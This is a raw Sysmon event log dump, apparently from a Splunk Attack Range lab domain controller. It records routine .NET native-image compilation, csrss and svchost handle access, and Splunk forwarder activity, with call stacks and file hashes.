21:03:56.914{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BC-60D3-7D03-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020431Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:56.883{4DB9351A-A1BC-60D3-7C03-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\cd8-0\Microsoft.KeyDistributionService.Cmdlets.dll2021-06-23 21:03:56.883 10341000x800000000000000020430Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:56.774{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BC-60D3-7C03-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020429Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.680{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BC-60D3-7C03-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020428Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:56.680{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BC-60D3-7C03-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020427Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:56.598{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BC-60D3-7B03-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020426Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.567{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1BC-60D3-7B03-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:56.567{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BC-60D3-7B03-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020424Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:56.489{4DB9351A-A1BC-60D3-7A03-00000000CF01}1268C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4f4-0\Microsoft.Iscsi.Target.Commands.dll2021-06-23 21:03:56.489 23542300x800000000000000020423Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.364{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F886E28DCE2F3D1C43E9FBD51D963804,SHA256=8F422DDF7BB2E4506DA97A51ED0EB73A0DFEE34F7ED679B6AAEC27251163605A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020422Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.176{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE19F8A6E399F134A994FEDEC3CCE1A8,SHA256=64B702C7B9C0874370956A3030F318F6AC69BBD805383050591D872DC9A50673,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020421Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.051{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BC-60D3-7A03-00000000CF01}1268C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020420Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:56.020{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1BC-60D3-7A03-00000000CF01}1268C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020419Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.020{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BC-60D3-7A03-00000000CF01}1268C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020463Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:57.992{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1BD-60D3-8203-00000000CF01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020462Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.992{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020461Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:57.992{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.992{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:57.992{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.992{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1BD-60D3-8203-00000000CF01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:57.992{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1BD-60D3-8203-00000000CF01}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000020482Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:59.696{4DB9351A-A1BF-60D3-8703-00000000CF01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000020481Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:59.305{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43DC98C5EC4D1F38794CB1818AD35DB0,SHA256=972F4448938784B6F0C317BD965A2EBEADCDCB249CBE58149E7573EC400B2BDF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020508Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:00.961{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C0-60D3-8C03-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020507Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.961{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C0-60D3-8C03-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 
11241100x800000000000000020506Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:00.945{4DB9351A-A1C0-60D3-8B03-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b88-0\Microsoft.NetworkController.SDNDiagnosticsTask.dll2021-06-23 21:04:00.945 10341000x800000000000000020505Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.852{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C0-60D3-8B03-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020504Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.820{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1C0-60D3-8B03-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020503Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
